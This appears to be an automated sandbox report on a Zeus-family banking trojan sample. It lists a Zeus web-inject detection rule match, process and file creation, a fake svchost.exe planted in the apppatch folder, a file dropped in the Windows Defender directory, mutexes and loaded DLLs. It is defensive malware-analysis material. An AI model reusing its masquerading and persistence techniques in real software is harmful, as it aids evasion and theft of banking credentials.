Source: Process Memory Space: NcYLgtXIKJgHj.exe PID: 6008, type: MEMORYSTR	Matched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04

Source: Bpfz752pYZ.exe	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: svchost.exe.0.dr	Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: classification engine

Classification label: mal100.bank.troj.spyw.expl.evad.winEXE@13/67@2302/27

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00401C70 Sleep,memset,CreateToolhelp32Snapshot,CreateToolhelp32Snapshot,GetLastError,SwitchToThread,CreateToolhelp32Snapshot,GetHandleInformation,CloseHandle,Module32First,StrStrIA,Module32Next,StrStrIA,StrStrIA,Module32Next,

0_2_00401C70

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Code function: 0_2_00402560 CoInitializeEx,GetModuleFileNameW,SysAllocString,SysAllocString,SysAllocString,CoCreateInstance,CoCreateInstance,CoCreateInstance,SysFreeString,SysFreeString,SysFreeString,CoUninitialize,

0_2_00402560

Source: C:\Windows\apppatch\svchost.exe

File created: C:\Program Files (x86)\Windows Defender\vonypom.com

Jump to behavior

Source: C:\Windows\apppatch\svchost.exe

File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\login[1].htm

Jump to behavior

Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4180
Source: C:\Windows\apppatch\svchost.exe	Mutant created: NULL
Source: C:\Windows\apppatch\svchost.exe	Mutant created: \Sessions\1\BaseNamedObjects\7D2DE4ADa
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess1656
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3704
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess4836
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess3000
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5376
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5720
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5576
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess616
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess936

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

File created: C:\Users\user\AppData\Local\Temp\97C3.tmp

Jump to behavior

Source: Bpfz752pYZ.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: Bpfz752pYZ.exe

ReversingLabs: Detection: 81%

Source: Bpfz752pYZ.exe	String found in binary or memory: -help
Source: svchost.exe	String found in binary or memory: -help

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe

File read: C:\Users\user\Desktop\Bpfz752pYZ.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\Bpfz752pYZ.exe "C:\Users\user\Desktop\Bpfz752pYZ.exe"
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 1656 -s 704
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3000 -s 736
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 616 -s 916
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3704 -s 712
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5576 -s 760
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4180 -s 992
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5376 -s 696
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4836 -s 740
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 936 -s 1444
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5720 -s 724
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Process created: C:\Windows\apppatch\svchost.exe "C:\Windows\apppatch\svchost.exe"	Jump to behavior

Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: inetcomm.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: inetres.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: vmhgfs.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Users\user\Desktop\Bpfz752pYZ.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: inetcomm.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: msoert2.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: inetres.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: vmhgfs.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: firewallapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwbase.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwpolicyiomgr.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: symsrv.dll	Jump to behavior
Source: C:\Windows\apppatch\svchost.exe	Section loaded: samlib.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: winscard.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: devobj.dll	Jump to behavior
Source: C:\Program Files (x86)\nFQGqJWqToOcwOOJpiJkvdMoOKWSaIRQUUaYcAtfduoYRgKrHBzFLFNpnZWbYXGDOpsSxIrpvMuErJL\NcYLgtXIKJgHj.exe	Section loaded: sensapi.dll	Jump to behavior
